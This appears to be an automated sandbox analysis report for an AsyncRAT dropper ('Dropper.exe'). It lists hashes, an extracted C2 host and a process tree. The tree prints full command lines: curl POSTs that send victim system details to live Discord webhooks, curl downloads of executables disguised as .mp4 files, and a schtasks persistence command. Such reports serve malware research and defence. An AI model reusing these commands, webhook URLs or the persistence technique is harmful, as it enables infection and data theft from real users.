Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-07-2024 23:02
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Dropper.exe
Resource
win10v2004-20240709-en
General
-
Target
Dropper.exe
-
Size
12KB
-
MD5
3c7266e1f13c9dd74dba9b7546601d01
-
SHA1
71434fc2a94fd910820f6b8d7d9440a5c45b7ae0
-
SHA256
5ab63870b80c8c0b2fb482f1c9581682740feac9ae7a5c0d8fd9b31997865330
-
SHA512
3b71e65c0d815b6444c6f908af0015491147438977bcb795b318a07b3b78e1c4491cf21265b90c742fb5615a900256bb2e03cf2074993cec07f46dcd6ae111b2
-
SSDEEP
384:t/kXUT2i7q9bJnz6PbQ4+FBCf3tmfhhD84VCsk:n2n9bJMbIytkhhDJwsk
Malware Config
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/files/0x000100000002ab69-6.dat family_asyncrat -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4900 $77-adchost.exe 3052 $77-aachost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 2 discord.com 3 discord.com 11 discord.com 14 discord.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 5076 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5036 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe 4900 $77-adchost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4900 $77-adchost.exe Token: SeDebugPrivilege 3052 $77-aachost.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 2664 wrote to memory of 4984 2664 Dropper.exe 79 PID 2664 wrote to memory of 4984 2664 Dropper.exe 79 PID 2664 wrote to memory of 4984 2664 Dropper.exe 79 PID 4984 wrote to memory of 1532 4984 Dropper.exe 81 PID 4984 wrote to memory of 1532 4984 Dropper.exe 81 PID 4984 wrote to memory of 1532 4984 Dropper.exe 81 PID 1532 wrote to memory of 1540 1532 cmd.exe 83 PID 1532 wrote to memory of 1540 1532 cmd.exe 83 PID 1532 wrote to memory of 1540 1532 cmd.exe 83 PID 4984 wrote to memory of 2820 4984 Dropper.exe 84 PID 4984 wrote to memory of 2820 4984 Dropper.exe 84 PID 4984 wrote to memory of 2820 4984 Dropper.exe 84 PID 2820 wrote to memory of 2472 2820 cmd.exe 86 PID 2820 wrote to memory of 2472 2820 cmd.exe 86 PID 2820 wrote to memory of 2472 2820 cmd.exe 86 PID 4984 wrote to memory of 4900 4984 Dropper.exe 87 PID 4984 wrote to memory of 4900 4984 Dropper.exe 87 PID 4984 wrote to memory of 2232 4984 Dropper.exe 88 PID 4984 wrote to memory of 2232 4984 Dropper.exe 88 PID 4984 wrote to memory of 2232 4984 Dropper.exe 88 PID 2232 wrote to memory of 1508 2232 cmd.exe 90 PID 2232 wrote to memory of 1508 2232 cmd.exe 90 PID 2232 wrote to memory of 1508 2232 cmd.exe 90 PID 4984 wrote to memory of 3792 4984 Dropper.exe 91 PID 4984 wrote to memory of 3792 4984 Dropper.exe 91 PID 4984 wrote to memory of 3792 4984 Dropper.exe 91 PID 3792 wrote to memory of 4064 3792 cmd.exe 93 PID 3792 wrote to memory of 4064 3792 cmd.exe 93 PID 3792 wrote to memory of 4064 3792 cmd.exe 93 PID 4900 wrote to memory of 1984 4900 $77-adchost.exe 94 PID 4900 wrote to memory of 1984 4900 $77-adchost.exe 94 PID 4900 wrote to memory of 1396 4900 $77-adchost.exe 96 PID 4900 wrote to memory of 1396 4900 $77-adchost.exe 96 PID 1396 wrote to memory of 5076 1396 cmd.exe 98 PID 1396 wrote to memory of 5076 1396 cmd.exe 98 PID 1984 wrote to memory of 5036 1984 cmd.exe 99 PID 1984 wrote to memory of 5036 1984 cmd.exe 99 PID 1396 wrote to memory of 3052 1396 cmd.exe 100 PID 1396 wrote to memory of 3052 1396 cmd.exe 100 PID 3052 wrote to memory of 4468 3052 $77-aachost.exe 101 PID 3052 wrote to memory of 4468 3052 $77-aachost.exe 101 PID 4468 wrote to memory of 3904 4468 cmd.exe 103 PID 4468 wrote to memory of 3904 4468 cmd.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted2⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe4⤵PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDBAA.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:5076
-
-
C:\Users\Admin\AppData\Roaming\$77-aachost.exe"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: ELEOLWUJ\nSystem Architecture: 64-bit\nHWID: A553C6FD93E508E2911B\nUser HWID: S-1-5-21-3766757357-1293853516-507035944-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl6⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: ELEOLWUJ\nSystem Architecture: 64-bit\nHWID: A553C6FD93E508E2911B\nUser HWID: S-1-5-21-3766757357-1293853516-507035944-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl7⤵PID:3904
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe4⤵PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.ComponentModel.Win32Exception (0x80004005): The file or directory is corrupted and unreadable at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo) at System.Diagnostics.Process.Start() at System.Diagnostics.Process.Start(ProcessStartInfo startInfo) at Dropper.Dropping.Run(String path) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.ComponentModel.Win32Exception (0x80004005): The file or directory is corrupted and unreadable4⤵PID:4064
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD5bb27934be8860266d478c13f2d65f45e
SHA1a69a0e171864dcac9ade1b04fc0313e6b4024ccb
SHA25685ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4
SHA51287dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb
-
Filesize
66KB
MD5514d0abd73e992c2a1622795b33f17f4
SHA196740e82d7a119d808000783507bd92690584fe6
SHA256b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
SHA5124600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8
-
Filesize
263B
MD520756e83a8ee849b05cd19d36217ad05
SHA1e16ce7723eac5364fb0ea17c5c452c696fa80273
SHA256b77f66d1a820d491cb6b9088f5122d999877a15e3f39d6eacb8f16f421796d7d
SHA512eb55ee4584ddb5daccef8ce6fb069b69a3ef84f744dbafec5804539ffe00fc43f9eea6bd0a17f72ad0fdd2c7d00e96d524f26468874e568e5d2855c5205f6e64
-
Filesize
155B
MD5bd5754bbe941c28d3a99b667a205993e
SHA1e9e7a51bef8780151188988a317b3da1ab9c0db0
SHA25689cdaab7a569cd15e85ecfb94b1ff6738651d165b0ecfb39d402f0b98929dada
SHA512d2ec70d5b17a0d954f1bfc7df35f24a8b312c736bc3d91ab0bef6dbdef0708429c7da343bd67982d47483328055ea1c58e3439f8c9dedb2bdc3f6b4c3605e7fd